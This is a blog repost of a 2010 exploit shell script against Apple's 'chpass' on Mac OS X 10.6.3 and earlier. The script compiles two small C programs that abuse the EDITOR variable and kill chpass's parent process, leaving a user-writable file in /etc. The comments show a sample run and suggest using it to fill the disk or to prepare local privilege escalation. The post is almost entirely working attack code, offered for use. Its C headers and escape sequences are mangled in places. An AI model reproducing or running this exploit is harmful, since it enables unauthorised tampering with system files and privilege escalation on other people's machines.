/home/mb3e/

♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln

 Text : 

#!/bin/sh
# Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
# =====================================================================
# A user can create a file with rw perms in /etc as owner and populate
# it with arbitrary data. This could be utilized to fill the disk or
# write configuration file information that could be combined with
# another flaw to elevate local privileges. This shell script takes
# an arguement which is the filename to create (appended with .XXXXXX)
# or I.HAX by default.
#
# e.g
#
# fantastics-macbook:~ fantastic$ id
# uid=501(fantastic) gid=20(staff) groups=20(staff)
# fantastics-macbook:~ fantastic$ ls -l /etc
# lrwxr-xr-x@ 1 root wheel 11 10 Feb 18:42 /etc -> private/etc
# fantastics-macbook:~ fantastic$ ./prdelka-vs-APPLE-chpass.sh
# [ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit
# Password for fantastic: fuck.apple
# [ Created evil file /etc/I.HAX.9GrrKm
# [ Killing my parent PID 1472
# ./prdelka-vs-APPLE-chpass.sh: line 47: 1472 Killed ./exploit I.HAX
# fantastics-macbook:~ fantastic$ ls -al /etc/I.HAX.9GrrKm
# -rw------- 1 fantastic staff 203 17 May 21:15 /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ echo "Turtle power" >
/etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ cat /etc/I.HAX.9GrrKm
# Turtle power
#
# -- prdelka
cat >> evil.c << EOF
#include
#include
#include

int main(int argc,char* argv[]){
printf("[ Created evil file %sn",argv[1]);
pid_t parent = getppid();
printf("[ Killing my parent PID %dn",parent);
usleep(1000);
kill(parent,9);
exit(0);
}
EOF
gcc evil.c -o evil 2>/dev/null
rm -rf evil.c
cat >> exploit.c << EOF
#include
#include
#include

int main(int argc,char* argv[]){
char* envp[]={"EDITOR=./evil",NULL};
char* args[]={argv[1],NULL};
printf("[ Apple <= 10.6.3 'chpass' arbitrary /etc file creation
exploitn");
execve("/usr/bin/chpass",args,envp);
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
then
./exploit $1
else
./exploit I.HAX
fi
rm -rf evil exploit



Arrow  References :  http://securityreason.com/wlb_show/WLB-2010050116
  • Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
  • Unknown
  • May 21, 2010
  • No comments:
 

0 comments:

Post a Comment

silahkan tinggalkan komentar anda disini .. :D

Subscribe to: Post Comments (Atom)